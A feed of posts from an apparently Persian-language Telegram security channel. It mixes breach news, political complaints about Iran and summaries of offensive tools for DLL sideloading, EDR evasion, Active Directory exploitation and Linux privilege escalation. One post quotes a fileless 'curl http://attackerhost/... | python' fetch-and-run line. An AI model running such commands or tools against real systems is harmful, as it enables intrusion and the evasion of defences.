⭕️شرکت امنیتی روسیه ای به نام #Positive_technologies هک شده و دیتای نرم افزارهای امنیت شرکت در فروم XSS به اشتراک گذاشته شد.
معروف ترین نرم افزار این شرکت همون سندباکس معروف بود که داشتن ، اینم توسط هکرها به اشتراک گذاشته شد.
#Positive_technologies
#Russia
@securation
معروف ترین نرم افزار این شرکت همون سندباکس معروف بود که داشتن ، اینم توسط هکرها به اشتراک گذاشته شد.
#Positive_technologies
#Russia
@securation
😁34👍5🤩3❤1🎉1
⭕️ برای خودکار کردن فرایند DLL Sideloading ابزاری توسعه داده شده که از تکنیک های مختلفی استفاده میکند.
از جمله تکنیک ها و ویژگی های استفاده شده در این ابزار میتوان مثال زد:
#RedTeam #Evasion
@securation
از جمله تکنیک ها و ویژگی های استفاده شده در این ابزار میتوان مثال زد:
Reformatted Structure
Polymorphic Code Integration
SysWhispers 3 Integration
AES Encryption
Early Bird Injection
Module Stomping
#RedTeam #Evasion
@securation
GitHub
GitHub - georgesotiriadis/Chimera: Automated DLL Sideloading Tool With EDR Evasion Capabilities
Automated DLL Sideloading Tool With EDR Evasion Capabilities - georgesotiriadis/Chimera
👍8❤5
Forwarded from CTF Community | Hints
⭕️ The #ASIS #CTF Final 2023 is set for December 29-30! 🗓️ Calling all CTFers to join in for an epic showdown and compete against each other in the last CTF of the year!
asisctf.com
💻🏆 #ASISCTF #CTF2023 #CaptureTheFlag #InfoSec
@ctfplay
https://twitter.com/ASIS_CTF/status/1737872564372885928?t=ZpU8ITLKi2erAfRB2-tjCQ&s=19
asisctf.com
💻🏆 #ASISCTF #CTF2023 #CaptureTheFlag #InfoSec
@ctfplay
https://twitter.com/ASIS_CTF/status/1737872564372885928?t=ZpU8ITLKi2erAfRB2-tjCQ&s=19
❤10👍2
قبلا بسته ی 7 گیگ یک ماهه ايرانسل 29 هزار تومن بود، الان 7 گیگ حذف شده و جایگزینش گذاشتن 6 گیگ و قیمت هم شده 37 هزار تومن.
جمهوری اسلامی اینشکلیه دوستان :)
اگر مشابه اش رو حفظ یا با مدرک داشتید به اشتراک بذارید بررسی کنیم.
جمهوری اسلامی اینشکلیه دوستان :)
اگر مشابه اش رو حفظ یا با مدرک داشتید به اشتراک بذارید بررسی کنیم.
👍62👎14😢7🔥4
⭕️ داستان گرون شدن ها معمولا در حکومت اسلامی اینشکلی هست که یک مورد را 300 درصد گران میکنند ، مردم اعتراض میکنند و بعد حکومت اسلامی میاد میگه خب بابت اینکه حرف مردم رو گوش بدیم فقط 100 درصد گران میکنیم.
مردم هم جیغ و دست و هورا ..
این داستان من رو یاد شیر توی قفس میندازه که عرعر میکرد و علف میخورد...
ایا نوبت مردم ایران هم میرسه اینطور بشن؟
داستانش رو اینجا چندسال قبل نوشتم :
https://www.instagram.com/p/CHcsPgfFZTR/?igsh=MXcxdTZldG0xNXE1OQ==
مردم هم جیغ و دست و هورا ..
این داستان من رو یاد شیر توی قفس میندازه که عرعر میکرد و علف میخورد...
ایا نوبت مردم ایران هم میرسه اینطور بشن؟
داستانش رو اینجا چندسال قبل نوشتم :
https://www.instagram.com/p/CHcsPgfFZTR/?igsh=MXcxdTZldG0xNXE1OQ==
👍60👎13❤3😁2😱2
⭕️Memory Patcher ای نوشته شده است که با استفاده از تکنیک API Hooking، تغییراتی در سیستم مورد نظر اعمال میکند. این ابزار ویژگیهای زیر را داراست:
#RedTeam #MalDev
@securation
1. Anti Debugging: Disables specific anti-debugging mechanisms to facilitate debugging in certain scenarios.
2. BSoD (Blue Screen of Death): Prevents or mitigates potential causes leading to system crashes or blue screen errors
3. BlockInput:Controls the system's input-blocking functionality to manage or bypass certain input restrictions.
4. FindWindow:Modifies the behavior of the FindWindow API function for specific use cases
#RedTeam #MalDev
@securation
GitHub
GitHub - idkhidden/winapipatcher: WinApi Patcher is a straightforward tool leveraging windows API hooking to patch and modify certain…
WinApi Patcher is a straightforward tool leveraging windows API hooking to patch and modify certain behaviors in a targeted environment. - idkhidden/winapipatcher
👍8👎3❤2
👍16👎9😁2😢2
⭕️ اسکریپتی با استفاده از پاورشل نوشته شده است و برای IR و Threat Hunting در ویندوز مناسب است.
با استفاده از این اسکریپت، میتوان به سرعت لیستی از موارد زیر را بررسی کرد:
#DFIR #ThreatHunting
@securation
با استفاده از این اسکریپت، میتوان به سرعت لیستی از موارد زیر را بررسی کرد:
General information
Accountand group information
Network
Process Information
OS Build and HOTFIXE
Persistence
HARDWARE Information
Encryption information
FIREWALL INFORMATION
Services
History
SMB Queries
Remoting queries
REGISTRY Analysis
LOG queries
Instllation of Software
User activity
بعلاوه، با استفاده از کوئریهای پیشرفته، موارد زیر نیز قابل بررسی هستند:
Prefetch file information
DLL List
WMI filters and consumers
#DFIR #ThreatHunting
@securation
GitHub
GitHub - emrekybs/Douglas-042: Powershell noscript to help Speed up Threat hunting incident response processes
Powershell noscript to help Speed up Threat hunting incident response processes - emrekybs/Douglas-042
👍8👎3❤2🤩2
⭕️Fuzzer ای بر روی شبیه ساز SIMICS نوشته شده که قابلیت فاز کردن UEFI اپلیکیشن ها،bootloader ها،BIOS،کرنل ماژول ها، device firmware ها و حتی برنامه های سطح یوزر ویندوز و لینوکس را دارد.
از قابلیت ها و ویژگی های آن میتوان مثال زد:
#Exploitation #Fuzzing
@securation
از قابلیت ها و ویژگی های آن میتوان مثال زد:
Edge coverage guided
Snapshotting (fully deterministic)
Parallel fuzzing (across cores, machines soon)
Easy to add to existing SIMICS projects
Triage mode to reproduce and debug crashes
Modern fuzzing methodologies:
Redqueen/I2S taint-based mutation
MOpt & Auto-token mutations
TSFFS is focused on several primary use cases:
UEFI and BIOS code, particulary based on EDKII
Pre- and early-silicon firmware and device drivers
Hardware-dependent kernel and firmware code
Fuzzing for complex error conditions
However, TSFFS is also capable of fuzzing:
Kernel & kernel drivers
User-space applications
Network applications
#Exploitation #Fuzzing
@securation
GitHub
GitHub - intel/tsffs: A snapshotting, coverage-guided fuzzer for software (UEFI, Kernel, firmware, BIOS) built on SIMICS
A snapshotting, coverage-guided fuzzer for software (UEFI, Kernel, firmware, BIOS) built on SIMICS - intel/tsffs
🤩7👍5❤1
⭕️ شرکت امنیتی Hudson Rock یک گزارش تهیه کرده و نوشته سیستم یکی از کارمندان شرکت اسنپ فود به بدافزار StealC آلوده شده و از طریق اون دسترسی به اطلاعات پیدا کردند.
یکی از مشکلات شرکت ها و سازمان های ایران رو به شکل خیلی ساده و خلاصه میشه یا همین روش ها هک کرد.
دلیل اصلی هم نبود متخصص و دیدگاه مدیریت اشتباه هستش.
مثلا همه فکر میکنند که کار Blue Team توی سازمان ، این هست که چندتا مانیتورینگ نصب کنند و یه دوره اسپلانک توی اکادمی فلانی ثبت نام کنند و بعنوان Soc کار استخدامی بشن.
کل تیم رو میذاری روی Network Packet Analysis و هیچکدوم نمیتونند یک کار مفیدی انجام بدن پکت ها رو تحلیل کنند.
نکته مهم اینه امروزه تحلیلگر بدافزار نیاز قطعی هر شرکت و سازمانی هست ولی متاسفانه بخاطر نبود مدیر لایق و فنی و ترویج بیسوادی در جامعه به سمت اسکریپت کیددی ساختن توی حوزه Bug Bounty که فقط وب رو مبنای همه چیز قرار میدن ، باعث شده سازمان و شرکت و هرجایی اینطور موارد رو میبینه دیگه به بحثهای عمیق امنیت توجهی نداشته باشه.
اگر اسنپ فود با این روش که استیلر روی سیستم یکی از کارمندهاش بوده و هک شده بنظرم یک بار دیگه از صفر کل زیرساخت شرکت و تمام نیروی انسانی چه فنی چه اداری و غیره ، همه رو آموزش بدید و یک Review بزنید کل سیستم های اینها رو.
هدف قرار دادن کارمندهایی که دسترسی بیشتری در سازمان دارن ، توی پروژه های Red Team معمولا تعریف میشه ، چیزی که اسنپ فود و کل تیم اسنپ همچین موردی نداشتن و شایدم ما هیچوقت ندیدیم همچین چیزهایی ازشون.
درهرصورت اگه توی یک کمپانی که داری محصول و دیتا هست کار میکنید، بدنیست بجز اون شرکت امنیتی یا تیم امنیتی که پیمانکارِ ثابت شما هست ، سالی یک بار یه پروژه Red Team بدید خارج از این اکیپ های خودتون بلکه اقدام مناسبی جهت امنیت شرکت و سازمان خودتون داشته باشید.
https://www.infostealers.com/article/mysterious-hacker-strikes-iran-with-major-cyberattacks-against-industry-leading-companies/
#هک #اسنپ_فود #دیتا
@securation
یکی از مشکلات شرکت ها و سازمان های ایران رو به شکل خیلی ساده و خلاصه میشه یا همین روش ها هک کرد.
دلیل اصلی هم نبود متخصص و دیدگاه مدیریت اشتباه هستش.
مثلا همه فکر میکنند که کار Blue Team توی سازمان ، این هست که چندتا مانیتورینگ نصب کنند و یه دوره اسپلانک توی اکادمی فلانی ثبت نام کنند و بعنوان Soc کار استخدامی بشن.
کل تیم رو میذاری روی Network Packet Analysis و هیچکدوم نمیتونند یک کار مفیدی انجام بدن پکت ها رو تحلیل کنند.
نکته مهم اینه امروزه تحلیلگر بدافزار نیاز قطعی هر شرکت و سازمانی هست ولی متاسفانه بخاطر نبود مدیر لایق و فنی و ترویج بیسوادی در جامعه به سمت اسکریپت کیددی ساختن توی حوزه Bug Bounty که فقط وب رو مبنای همه چیز قرار میدن ، باعث شده سازمان و شرکت و هرجایی اینطور موارد رو میبینه دیگه به بحثهای عمیق امنیت توجهی نداشته باشه.
اگر اسنپ فود با این روش که استیلر روی سیستم یکی از کارمندهاش بوده و هک شده بنظرم یک بار دیگه از صفر کل زیرساخت شرکت و تمام نیروی انسانی چه فنی چه اداری و غیره ، همه رو آموزش بدید و یک Review بزنید کل سیستم های اینها رو.
هدف قرار دادن کارمندهایی که دسترسی بیشتری در سازمان دارن ، توی پروژه های Red Team معمولا تعریف میشه ، چیزی که اسنپ فود و کل تیم اسنپ همچین موردی نداشتن و شایدم ما هیچوقت ندیدیم همچین چیزهایی ازشون.
درهرصورت اگه توی یک کمپانی که داری محصول و دیتا هست کار میکنید، بدنیست بجز اون شرکت امنیتی یا تیم امنیتی که پیمانکارِ ثابت شما هست ، سالی یک بار یه پروژه Red Team بدید خارج از این اکیپ های خودتون بلکه اقدام مناسبی جهت امنیت شرکت و سازمان خودتون داشته باشید.
https://www.infostealers.com/article/mysterious-hacker-strikes-iran-with-major-cyberattacks-against-industry-leading-companies/
#هک #اسنپ_فود #دیتا
@securation
InfoStealers
Mysterious hacker strikes Iran with major cyberattacks against industry leading companies
A hacker who goes by the username “irleaks” posted a thread in which they attempt to sell over 160,000,000 records of Iranians
👍34👎6😁5🔥4❤1
⭕️ امروزه برای سریع تر کردن و خودکار سازی فرایند تست نفوذ و یا ردتیم ما سعی میکنیم اسکریپت هایی یا اصطلاحا Kit هایی توسعه بدیم که فرایند کار بهبود پیدا کنه. Kit هایی برای فرایند Recon و Exploit در Active Directory توسعه داده شده که به ویژگی هاشون میپردازیم:
اسکرپیت AD-SecurityAudit.sh بر روی Recon ابتدایی و شناسایی آسیب پذیری ها دقت دارد با ویژگی های کلیدی زیر:
و اسکریپت AutoMapExec.sh عمیق تر شده و بر روی اکسپلویت کردن آن آسیب پذیری ها دقت دارد با ویژگی های زیر:
https://github.com/emrekybs/AD-AssessmentKit
#RedTeam #Exploitation #AD
@securation
اسکرپیت AD-SecurityAudit.sh بر روی Recon ابتدایی و شناسایی آسیب پذیری ها دقت دارد با ویژگی های کلیدی زیر:
LDAP and Service Account Queries: Conducts LDAP searches targeting service accounts in the AD.
Kerberos Ticket Analysis: Uses Impacket's tools for analyzing Kerberos ticket vulnerabilities and identifying accounts without pre-authentication
Comprehensive Kerberos and SMB Enumeration: Employs SilentHound and Enum4linux-ng for Kerberos auditing and detailed SMB, user, and system information scanning.
Enumeration Techniques: Implements RID brute-force and NetExec SMB enumeration for discovering user accounts, groups, and security policies.
Exploitation of Windows Services: Executes Zerologon and PetitPotam attacks to target known vulnerabilities.
Execution Summary and Actionable Guidance: Completes with a success message and provides insights for further actions, such as hash cracking.
و اسکریپت AutoMapExec.sh عمیق تر شده و بر روی اکسپلویت کردن آن آسیب پذیری ها دقت دارد با ویژگی های زیر:
Credential-Based Targeting: Uses user-provided credentials for a more thorough analysis.
Kerberos Auditing and Extensive SMB Enumeration: Combines SilentHound and multiple NetExec commands for a deeper level of SMB and security analysis.
Network and AD Comprehensive Scanning: Utilizes CrackMapExec for an extensive view of the network, including computer listings, local groups, and NTDS extraction.Testing Against Major Vulnerabilities: Incorporates exploitation of significant
Testing Against Major Vulnerabilities: Incorporates exploitation of significant vulnerabilities like Zerologon, PetitPotam, and NoPAC.
BloodHound Integration and RDP Enablement: Facilitates AD data collection for BloodHound analysis and enables Remote Desktop Protocol.
Diverse Command Execution and Data Retrieval: Performs a range of system commands and retrieves the SAM database for in-depth credential analysis.
Detailed Execution Overview: Concludes with a summary of successful execution, signifying the completion of a comprehensive scanning and enumeration process
https://github.com/emrekybs/AD-AssessmentKit
#RedTeam #Exploitation #AD
@securation
👍11❤7👎4🤩2🔥1
⭕️ شیاد بودن مختص قشرهای مختلفی شده به طوری که این پزشک ها پول ویزیت رو آنلاین دریافت میکنند و بهت زمان نوبت میدن، از کار و زندگیت میگذری و کلی هزینه میکنی بری ، یهوی میبینی سه ماهه در این آدرس نیست و سامانه کلاهبرداری Paziresh24.ir هم پشتیبانی و پاسخگویی نداره و شماره تلفنی آدرسی از این خانم های آشغال پیدا نمیشه کرد:)
به همین راحتی کلاهبرداری در ایران راحت رخ میده و هیچ جایی مردم دستشون بند نیست.
#سامانه_انلاین #پذیرش۲۴
#پزشک_شیاد #کلاهبرداری_پزشکی
@securation
به همین راحتی کلاهبرداری در ایران راحت رخ میده و هیچ جایی مردم دستشون بند نیست.
#سامانه_انلاین #پذیرش۲۴
#پزشک_شیاد #کلاهبرداری_پزشکی
@securation
👍49😱12😁6👎5
⭕️یک نیروی نفوذی سازمان اطلاعات هلند بنام اریک، عامل منتشر کننده ویروس خرابکار استاکسنت در سال ۲۰۰۷ بوده ، ویروسی که خرابکاری زیادی در راکتور های هسته ای ایران به وجود آورد.
https://nos.nl/artikel/2504114-nederlander-saboteerde-atoomcomplex-in-iran-den-haag-wist-niets
#stuxnet
@securation
https://nos.nl/artikel/2504114-nederlander-saboteerde-atoomcomplex-in-iran-den-haag-wist-niets
#stuxnet
@securation
nos.nl
‘Nederlander saboteerde atoomcomplex in Iran, Den Haag wist niets’
De sabotageactie vond plaats in 2007. De AIVD-infiltrant is kort na de operatie overleden door een motorongeluk, schrijft de Volkskrant.
❤22👎14👍8🔥2😁2😢2🎉1
⭕️بسته های بلند مدت اینترنت توسط اپراتورهای جمهوری اسلامی همگی از پنل نرم افزارها غیب شدن تا مردم دیگه هرهفته و ماه بسته های گرون شده رو به قیمت دوبرابر بخرند.
وزیر قطع ارتباطات جمهوری اسلامی گفته بود اپراتورها حق ندارن بسته ها رو حذف کنند.
#پشمک_مالنده
https://twitter.com/1rpwn/status/1744635321688420715?t=SV59vfHEark2ZQeS58Zlbg&s=19
وزیر قطع ارتباطات جمهوری اسلامی گفته بود اپراتورها حق ندارن بسته ها رو حذف کنند.
#پشمک_مالنده
https://twitter.com/1rpwn/status/1744635321688420715?t=SV59vfHEark2ZQeS58Zlbg&s=19
👍39😁6👎5😢4🤩1
⭕️ اسکریپتی توسعه داده شده است که از ابزارهای توسعه داده قبلی مانند EDRSilencer و FireBlock بهره برده است. هدف اصلی این اسکریپت، شناسایی فایل های اجرایی مختلف است که با استفاده از پلتفرم فیلترینگ ویندوز (WFP) غیر فعال شده اند. برای دستیابی به این هدف، از ماژول NtObjectManager در اسکریپت استفاده شده است.
#RedTeam #Evasion
@securation
Detection approach
There is no native way to list and interact with WFP. To do that we need to use the NtObjectManager module.
With the help of NtObjectManager we will be able to list all filters and the approach will be:
Create a list with the executables you want to check
Listed filters that block connections
Filter that list by the executables provided
#RedTeam #Evasion
@securation
GitHub
GitHub - amjcyber/EDRNoiseMaker: Detect WFP filters blocking EDR communications
Detect WFP filters blocking EDR communications. Contribute to amjcyber/EDRNoiseMaker development by creating an account on GitHub.
👍7👎1
⭕️ به منظور خودکارسازی فرایند Privesc در سیستم های لینوکس و یونیکس، یک ابزار توسعه داده شده است که در دستهبندی Missconfig های setuid/setgid و sudo permission ها و ... تمرکز دارد. این ابزار عمدتاً برای مسابقات CTF طراحی شده است، اما در محیط های واقعی نیز قابل استفاده است.
#RedTeam #Privesc #bypass
@securation
Features
Automatically exploit misconfigured sudo permissions.
Automatically exploit misconfigured suid, sgid permissions.
Automatically exploit misconfigured capabilities.
Automatically convert arbitrary file read primitive into shell by stealing SSH keys.
Automatically convert arbitrary file write primitive into shell by dropping SSH keys.
Automatically convert arbitrary file write primitive into shell by writing to cron.
Automatically convert arbitrary file write primitive into shell using LD_PRELOAD.
Single file, easy to run fileless with curl http://attackerhost/gtfonow.py | python
#RedTeam #Privesc #bypass
@securation
GitHub
GitHub - Frissi0n/GTFONow: Automatic privilege escalation for misconfigured capabilities, sudo and suid binaries using GTFOBins.
Automatic privilege escalation for misconfigured capabilities, sudo and suid binaries using GTFOBins. - Frissi0n/GTFONow
⭕️مدیر وبسایت #Breachedforum که محل خرید و فروش دیتابیس ها بود به 15 سال زندان در آمریکا محکوم شد.
امیدوارم روزی ایران هم اینشکلی قوانین رو سفت و سخت به کار بگیره تا هرکسی راحت جرم و جنایت رو ترویج نده.
#hack #Prison #breached #Forum
@securation
امیدوارم روزی ایران هم اینشکلی قوانین رو سفت و سخت به کار بگیره تا هرکسی راحت جرم و جنایت رو ترویج نده.
#hack #Prison #breached #Forum
@securation
⭕️تیم امنیت Microsoft طی یک اطلاعیه از شناسایی حمله یک گروه از هکرهای دولتی منتسب به روسیه خبر داده است.
حملاتی که تحت عنوان nation state هستن ، تحت حمایت یک نهاد جاسوسی یا دولتها هستند که از نظر تکنیکی و ابزاری بابت پشتیبانی های مالی بالا ، درصد موفق بودنشون بالاست...
https://msrc.microsoft.com/blog/2024/01/microsoft-actions-following-attack-by-nation-state-actor-midnight-blizzard/
#News #Hack #fsb #russia
@securation
حملاتی که تحت عنوان nation state هستن ، تحت حمایت یک نهاد جاسوسی یا دولتها هستند که از نظر تکنیکی و ابزاری بابت پشتیبانی های مالی بالا ، درصد موفق بودنشون بالاست...
https://msrc.microsoft.com/blog/2024/01/microsoft-actions-following-attack-by-nation-state-actor-midnight-blizzard/
#News #Hack #fsb #russia
@securation